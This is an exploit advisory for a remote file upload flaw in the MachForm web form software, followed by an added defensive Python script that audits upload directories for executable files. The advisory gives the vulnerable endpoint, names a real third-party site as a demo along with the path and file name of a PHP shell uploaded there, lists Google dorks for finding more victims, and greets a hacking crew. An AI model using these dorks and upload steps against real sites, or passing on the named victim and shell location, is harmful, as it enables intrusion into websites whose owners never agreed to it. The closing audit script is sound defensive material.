MachForm suffers from a remote shell upload vulnerability. Note that this finding houses site-specific data.
fc6ad89bb51317725acbfd9f8605acf89f178c4d83d2ac59c3418693d7002025
==================================================================================================
# [~] Exploit Title: MachForm RFU Bug #
# [~] Google Dork (For RFU) : " Bottom Of The Exploit " #
# [~] Date: 09/11/2012 (TU) #
# [~] Exploit Author: Samim.s #
# [~] Version: ALL Versions & ALL Languages #
# [~] Tested on: Se7en & BT5 #
# [~] Support WebSite : MachForm.com #
==================================================================================================
# [+] RFU Exploit : #
# http://WebSite.Com/[path]/view.php?id=X <~~ X = Number #
# [+] Demo : #
# http://www.birchgate.ca/machform/view.php?id=2 <~~ You Can Upload .PHP Files #
# #
# [+] Uploaded Files Address : #
# http://WebSite.Com/[path]/data/form_X/files/ <~~ X = ID #
# [+] Demo : #
# http://www.birchgate.ca/machform/data/form_2/files/ #
# Shell Address : element_6_900ebef8bf2f2a73e6af22a2251e039c-197-Samim.s.php # #
# ---------------------------------------------------------------------------------------------- #
# [+] Dorks : #
# intitle:"index of /form/data/*/files/" #
# inurl:"/form/view.php?id=" intext:"upload" #
==================================================================================================
# [*] GreetZ To: Mr.XpR - UnknowN - Mr.EBI - SaMaN.BiLiZ & All IRaNHaCK Member + Iranian HaCkerZ #
==================================================================================================
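
For administrators of an affected install, the following is an added example (not part of the original advisory and not MachForm code) that audits the upload tree named above, data/form_X/files/, for files a web server may execute. The extension list and the sample file names are assumptions constructed for illustration; only the directory layout is taken from the advisory.

```python
import os
import re
import sys

# Extensions often mapped to a script handler on PHP hosts (assumed list; match it to the server config).
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "pht", "phar", "cgi", "pl", "shtml"}
# Files that can change handler mappings for the directory they sit in.
CONFIG_NAMES = {".htaccess", ".user.ini"}
# Upload tree layout as given in the advisory: data/form_<id>/files/<name>
UPLOAD_RE = re.compile(r"(?:^|/)data/form_(\d+)/files/([^/]+)$")


def classify(path):
    """Return (form_id, name, reason) for a risky file in an upload dir, else None."""
    m = UPLOAD_RE.search(path.replace("\\", "/"))
    if not m:
        return None
    form_id, name = int(m.group(1)), m.group(2)
    lower = name.lower().rstrip(". ")  # trailing dots/spaces are dropped by some filesystems
    if lower in CONFIG_NAMES:
        return form_id, name, "handler config file"
    exts = lower.split(".")[1:]
    if exts and exts[-1] in SCRIPT_EXTS:
        return form_id, name, "script extension"
    if any(e in SCRIPT_EXTS for e in exts[:-1]):
        # Apache mod_mime can match a handler on any extension, not only the last one.
        return form_id, name, "inner script extension"
    return None


def audit(paths):
    """Classify every path and return the findings, ordered by form id then name."""
    return sorted(f for f in map(classify, paths) if f)


# Constructed sample listing (hypothetical file names following the advisory's layout).
SAMPLE = [
    "machform/data/form_2/files/element_6_0123abcd-197-report.pdf",
    "machform/data/form_2/files/element_6_0123abcd-198-page.PHP",
    "machform/data/form_3/files/element_1_4567ef01-12-photo.php.jpg",
    "machform/data/form_3/files/.htaccess",
    "machform/view.php",
]

if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else None
    paths = SAMPLE if root is None else (
        os.path.join(d, f) for d, _, fs in os.walk(root) for f in fs)
    for form_id, name, reason in audit(paths):
        print(f"form_{form_id}\t{reason}\t{name}")
```

Run it with the web root as the only argument to scan a real tree; with no argument it reports on the constructed sample. Any hit in an upload directory warrants review of the file and of whether script execution and directory listing are disabled for that path.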